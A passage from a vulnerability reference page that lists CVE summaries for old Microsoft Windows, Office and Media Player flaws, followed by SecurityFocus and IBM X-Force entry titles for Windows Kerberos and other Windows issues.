allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0615] The Windows Media Active Playlist in Microsoft Windows Media Player 7.1 stores information in a well known location on the local file system, allowing attackers to execute HTML scripts in the Local Computer zone, aka "Media Playback Script Invocation". [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0372] Microsoft Windows Media Player versions 6.4 and 7.1 and Media Player for Windows XP allow remote attackers to bypass Internet Explorer's (IE) security mechanisms and run code via an executable .wma media file with a license installation requirement stored in the IE cache, aka the "Cache Path Disclosure via Windows Media Player". [CVE-2002-0370] Buffer overflow in the ZIP capability for multiple products allows remote attackers to cause a denial of service or execute arbitrary code via ZIP files containing entries with long filenames, including (1) Microsoft Windows 98 with Plus! Pack, (2) Windows XP, (3) Windows ME, (4) Lotus Notes R4 through R6 (pre-gold), (5) Verity KeyView, and (6) Stuffit Expander before 7.0. [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0151] Buffer overflow in Multiple UNC Provider (MUP) in Microsoft Windows operating systems allows local users to cause a denial of service or possibly gain SYSTEM privileges via a long UNC request. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1200] Microsoft Windows XP allows local users to bypass a locked screen and run certain programs that are associated with Hot Keys. [CVE-2001-1055] The Microsoft Windows network stack allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed ARP request packets with random source IP and MAC addresses, as demonstrated by ARPNuke. [CVE-2001-0909] Buffer overflow in helpctr.exe program in Microsoft Help Center for Windows XP allows remote attackers to execute arbitrary code via a long hcp: URL. [CVE-2001-0719] Buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via a malformed Advanced Streaming Format (ASF) file. [CVE-2001-0541] Buffer overflow in Microsoft Windows Media Player 7.1 and earlier allows remote attackers to execute arbitrary commands via a malformed Windows Media Station (.NSC) file. [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to cause a denial of service via malformed inputs. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0242] Buffer overflows in Microsoft Windows Media Player 7 and earlier allow remote attackers to execute arbitrary commands via (1) a long version tag in an .ASX file, or (2) a long banner tag, a variant of the ".ASX Buffer Overrun" vulnerability as discussed in MS:MS00-090. [CVE-2001-0237] Memory leak in Microsoft 2000 domain controller allows remote attackers to cause a denial of service by repeatedly connecting to the Kerberos service and then disconnecting without sending any data. [CVE-2001-0047] The default permissions for the MTS Package Administration registry key in Windows NT 4.0 allows local users to install or modify arbitrary Microsoft Transaction Server (MTS) packages and gain privileges, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1113] Buffer overflow in Microsoft Windows Media Player allows remote attackers to execute arbitrary commands via a malformed Active Stream Redirector (.ASX) file, aka the ".ASX Buffer Overrun" vulnerability. [CVE-2000-1112] Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0929] Microsoft Windows Media Player 7 allows attackers to cause a denial of service in RTF-enabled email clients via an embedded OCX control that is not closed properly, aka the "OCX Attachment" vulnerability. [CVE-2000-0858] Vulnerability in Microsoft Windows NT 4.0 allows remote attackers to cause a denial of service in IIS by sending it a series of malformed requests which cause INETINFO.EXE to fail, aka the "Invalid URL" vulnerability. [CVE-2000-0849] Race condition in Microsoft Windows Media server allows remote attackers to cause a denial of service in the Windows Media Unicast Service via a malformed request, aka the "Unicast Service Race Condition" vulnerability. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2000-0742] The IPX protocol implementation in Microsoft Windows 95 and 98 allows remote attackers to cause a denial of service by sending a ping packet with a source IP address that is a broadcast address, aka the "Malformed IPX Ping Packet" vulnerability. [CVE-2000-0653] Microsoft Outlook Express allows remote attackers to monitor a user's email by creating a persistent browser link to the Outlook Express windows, aka the "Persistent Mail-Browser Link" vulnerability. [CVE-2000-0495] Microsoft Windows Media Encoder allows remote attackers to cause a denial of service via a malformed request, aka the "Malformed Windows Media Encoder Request" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0228] Microsoft Windows Media License Manager allows remote attackers to cause a denial of service by sending a malformed request that causes the manager to halt, aka the "Malformed Media License Request" Vulnerability. [CVE-2000-0216] Microsoft email clients in Outlook, Exchange, and Windows Messaging automatically respond to Read Receipt and Delivery Receipt tags, which could allow an attacker to flood a mail system with responses by forging a Read Receipt request that is redirected to a large distribution list. [CVE-2000-0168] Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. [CVE-2000-0089] The rdisk utility in Microsoft Terminal Server Edition and Windows NT 4.0 stores registry hive information in a temporary file with permissions that allow local users to read it, aka the "RDISK Registry Enumeration File" vulnerability. [CVE-1999-1291] TCP/IP implementation in Microsoft Windows 95, Windows NT 4.0, and possibly others, allows remote attackers to reset connections by forcing a reset (RST) via a PSH ACK or other means, obtaining the target's last sequence number from the resulting packet, then spoofing a reset to the target. [CVE-1999-0749] Buffer overflow in Microsoft Telnet client in Windows 95 and Windows 98 via a malformed Telnet argument. [CVE-1999-0681] Buffer overflow in Microsoft FrontPage Server Extensions (PWS) 3.0.2.926 on Windows 95, and possibly other versions, allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0288] The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. SecurityFocus - https://www.securityfocus.com/bid/: [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability [99424] Microsoft Windows Kerberos CVE-2017-8495 Security Bypass Vulnerability [92290] Microsoft Windows Kerberos CVE-2016-3237 Security Bypass Vulnerability [82535] Microsoft Windows Kerberos CVE-2016-0049 Local Security Bypass Vulnerability [77475] Microsoft Windows Kerberos CVE-2015-6095 Local Security Bypass Vulnerability [70958] Microsoft Windows Kerberos Checksum CVE-2014-6324 Remote Privilege Escalation Vulnerability [55778] Microsoft Windows Kerberos CVE-2012-2551 Denial of Service Vulnerability [46140] Microsoft Windows Kerberos Encryption Standard Spoofing Vulnerability [46130] Microsoft Windows Kerberos Unkeyed Checksum Local Privilege Escalation Vulnerability [42435] Microsoft Windows Kerberos 'Pass The Ticket' Replay Security Bypass Vulnerability [38110] Microsoft Windows Kerberos 'Ticket-Granting-Ticket' Remote Denial of Service Vulnerability [14520] Microsoft Windows Kerberos PKINIT Man In The Middle Vulnerability [14519] Microsoft Windows Kerberos Denial Of Service Vulnerability [8102] Microsoft Windows Terminal Service Kerberos Double Authorization Data Entry Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [78861] Microsoft Windows Kerberos denial of service [64901] Microsoft Windows Kerberos spoofing [64900] Microsoft Windows Kerberos checksum privilege escalation [61129] Microsoft Windows Kerberos security bypass [55922] Microsoft Windows Kerberos Ticket-Granting-Ticket (TGT) denial of service [21625] Microsoft Windows kerberos message denial of service [6506] Microsoft Windows 2000 Server Kerberos denial of service [4887] Microsoft Windows 2000 Kerberos ticket renewed [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86096] Microsoft Windows NTVDM privilege escalation 3 [86095] Microsoft Windows NTVDM privilege escalation 2 [86094] Microsoft Windows NTVDM privilege escalation 1 [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86090] Microsoft Windows ICMPv6 denial of service [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86074] Microsoft Windows Unicode code execution [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86072] Microsoft Windows Active Directory Federation Services information disclosure [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [86069] Microsoft Windows Windows NAT Driver denial of service [85801] Microsoft Windows Movie Maker .wav denial of service [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85234] Microsoft Windows privilege escalation [85233] Microsoft Windows denial of service [85232] Microsoft Windows privilege escalation [85231] Microsoft Windows TrueType font file code execution [85230] Microsoft Windows privilege escalation [85229] Microsoft Windows privilege escalation [85228] Microsoft Windows privilege escalation [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85226] Microsoft Windows Media Format Runtime code execution [85224] Microsoft Windows DefenderCVE-2013-3154 privilege escalation [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84620] Microsoft Windows kernel denial of service [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84618] Microsoft Windows Print Spooler privilege escalation [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84614] Microsoft Windows kernel information disclosure [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84571] Microsoft Windows denial of service [84546] Microsoft Windows Media Player .wav denial of service [84391] Microsoft Windows win32k.sys privilege escalation [84267] Microsoft Windows Update file detected [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83911] Microsoft Windows denial of service [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83875] Microsoft Windows privilege escalation [83874] Microsoft Windows privilege escalation [83873] Microsoft Windows privilege escalation [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83099] Microsoft Windows denial of service [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83097] Microsoft Windows privilege escalation [83096] Microsoft Windows privilege escalation [83095] Microsoft Windows denial of service [83094] Microsoft Windows privilege escalation [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83090] Microsoft Windows privilege escalation [83089] Microsoft Windows privilege escalation [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [83081] Microsoft Windows Client/Server Run-time Subsystem privilege escalation [83063] Microsoft Windows Modern Mail spoofing [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [82775] Microsoft Windows kernel privilege escalation [82774] Microsoft Windows ASLR and DEP security bypass [82772] Microsoft Windows ASLR security bypass [82769] Microsoft Windows TTF denial of service [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82599] Microsoft Windows Live Essentials information disclosure [82523] RSA Authentication Agent for Microsoft Windows Quick Pin security bypass [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82414] Microsoft Windows USB device privilege escalation [82413] Microsoft Windows USB device privilege escalation [82412] Microsoft Windows USB device privilege escalation [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [82089] Microsoft Windows ZwSetInformationProcess() denial of service [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81858] Microsoft Windows OLE code execution [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81682] Microsoft Windows .MPG code execution [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81679] Microsoft Windows Client/Server Run-time Subsystem memory privilege escalation [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81677] Microsoft Windows TCP/IP sequence denial of service [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81675] Microsoft Windows NFS server denial of service [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81673] Microsoft Windows Vector Markup Language code execution [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81671] Microsoft Windows kernel privilege escalation [81670] Microsoft Windows kernel privilege escalation [81669] Microsoft Windows kernel privilege escalation [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81665] Microsoft Windows CVE-2013-1277 privilege escalation [81664] Microsoft Windows CVE-2013-1276 privilege escalation [81663] Microsoft Windows CVE-2013-1275 privilege escalation [81662] Microsoft Windows CVE-2013-1274 privilege escalation [81661] Microsoft Windows CVE-2013-1273 privilege escalation [81660] Microsoft Windows CVE-2013-1272 privilege escalation [81659] Microsoft Windows CVE-2013-1271 privilege escalation [81658] Microsoft Windows CVE-2013-1270 privilege escalation [81657] Microsoft Windows CVE-2013-1269 privilege escalation [81656] Microsoft Windows CVE-2013-1268 privilege escalation [81655] Microsoft Windows CVE-2013-1267 privilege escalation [81654] Microsoft Windows CVE-2013-1266 privilege escalation [81653] Microsoft Windows CVE-2013-1265 privilege escalation [81652] Microsoft Windows CVE-2013-1264 privilege escalation [81651] Microsoft Windows CVE-2013-1263 privilege escalation [81650] Microsoft Windows CVE-2013-1262 privilege escalation [81649] Microsoft Windows CVE-2013-1261 privilege escalation [81648] Microsoft Windows CVE-2013-1260 privilege escalation [81647] Microsoft Windows CVE-2013-1259 privilege escalation [81646] Microsoft Windows CVE-2013-1258 privilege escalation [81645] Microsoft Windows CVE-2013-1257 privilege escalation [81644] Microsoft Windows CVE-2013-1256 privilege escalation [81643] Microsoft Windows CVE-2013-1255 privilege escalation [81642] Microsoft Windows CVE-2013-1254 privilege escalation [81641] Microsoft Windows CVE-2013-1253 privilege escalation [81640] Microsoft Windows CVE-2013-1252 privilege escalation [81639] Microsoft Windows CVE-2013-1251 privilege escalation [81638] Microsoft Windows CVE-2013-1250 privilege escalation [81637] Microsoft Windows CVE-2013-1249 privilege escalation [81636] Microsoft Windows CVE-2013-1248 privilege escalation [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80918] Microsoft Windows digital certificate spoofing [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80874] Microsoft Windows XML code execution [80873] Microsoft Windows XML content code execution [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80869] Microsoft .NET Framework Windows Forms privilege escalation [80867] Microsoft Windows Knowledge Base Article 2769327 update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80864] Microsoft Windows print spooler code execution [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80862] Microsoft Windows broadcast privilege escalation [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80860] Microsoft Windows SSL/TLS security bypass [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80359] Microsoft Windows IPHTTPS security bypass [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80357] Microsoft Windows DirectPlay buffer overflow [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80351] Microsoft Windows TrueType Fonts files code execution [80350] Microsoft Windows OpenType Font code execution [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79682] Microsoft Windows font code execution [79681] Microsoft Windows kernel privilege escalation [79680] Microsoft Windows kernel privilege escalation [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79678] Microsoft Windows filenames code execution [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [79676] Microsoft Windows Briefcase integer overflow [79675] Microsoft Windows Briefcase integer underflow [79648] Microsoft Windows Help Viewer denial of service [79479] Microsoft Windows Media Player .avi denial of service [79124] Microsoft Windows IKE privilege escalation [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78855] Microsoft Windows kernel privilege escalation [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78620] Microsoft Windows Phone 7 domain name spoofing [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77356] Microsoft Windows RAP response packet buffer overflow [77355] Microsoft Windows RAP response packet buffer overflow [77354] Microsoft Windows Print Spooler service format string [77353] Microsoft Windows Remote Administration Protocol denial of service [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77349] Microsoft Windows memory privilege escalation [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77347] Microsoft Windows Remote Desktop Protocol code execution [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows Knowledge Base Article 2720573 update is not installed [77341] Microsoft Windows ActiveX control code execution [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [77322] Microsoft Windows VBScript and JScript and Microsoft Internet Explorer object integer overflow [77244] nginx and Microsoft Windows request security bypass [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76720] Microsoft Windows hook procedure privilege escalation [76719] Microsoft Windows keyboard privilege escalation [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76707] Microsoft Windows search scopes information disclosure [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76703] Microsoft Windows file code execution [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [76701] Microsoft Windows TLS information disclosure [76223] Microsoft Windows .otf denial of service [76221] Microsoft Windows XML Core Services code execution [76026] Microsoft Windows Microsoft Certificate Authority spoofing [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75938] Microsoft Windows RDP code execution [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75933] Microsoft Windows thread privilege escalation [75932] Microsoft Windows font privilege escalation [75931] "Microsoft Windows Clipboard Format Atom Name privilege escalation" [75930] Microsoft Windows String Atom Class Name privilege escalation [75929] Microsoft Windows String Atom Class Name privilege escalation [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75927] Microsoft Windows User Mode Scheduler privilege escalation [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [75772] Microsoft Windows keyboard layout privilege escalation [75329] Microsoft Windows xxxCreateWindowEx() denial of service [75140] Microsoft Windows scrollbar calculation privilege escalation [75139] Microsoft Windows Keyboard Layout files privilege escalation [75138] Microsoft Windows messages privilege escalation [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75131] Microsoft Windows Plug and Play (PnP) privilege escalation [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75129] Microsoft Windows IPv6 address privilege escalation [75128] Microsoft Windows broadcast packets security bypass [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75126] Microsoft Windows GDI+ EMF buffer overflow [75125] Microsoft Windows GDI+ EMF code execution [75124] Microsoft Windows TrueType code execution [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74372] Microsoft Windows MSCOMCTL.OCX ActiveX control code execution [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73542] Microsoft Windows Remote Desktop Protocol denial of service [73541] Microsoft Windows Remote Desktop Protocol code execution [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73532] Microsoft Windows DNS Server denial of service [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [73529] Microsoft Windows PostMessage function privilege escalation [73356] Microsoft Windows DNS security bypass [72950] Microsoft Windows IPv6 information disclosure [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72854] Microsoft Windows keyboard privilege escalation [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72852] Microsoft Windows Authenticode code execution [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72850] Microsoft Windows msvcrt dynamic link library buffer overflow [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72840] Microsoft Windows Ancillary Function Driver privilege escalation [72839] Microsoft Windows Ancillary Function Driver privilege escalation [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72560] Microsoft Windows Media Format ASF invalid stream [72346] Microsoft Windows Explorer denial of service [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows Knowledge Base Article 2646524 update is not installed [72002] Microsoft Windows Client/Server Run-time Subsystem Unicode privilege escalation [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71997] Microsoft Windows SafeSEH security bypass [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71993] Microsoft Windows DirectShow code execution [71992] Microsoft Windows Media Player MIDI code execution [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71966] Microsoft Windows Media Player access denial of service [71944] 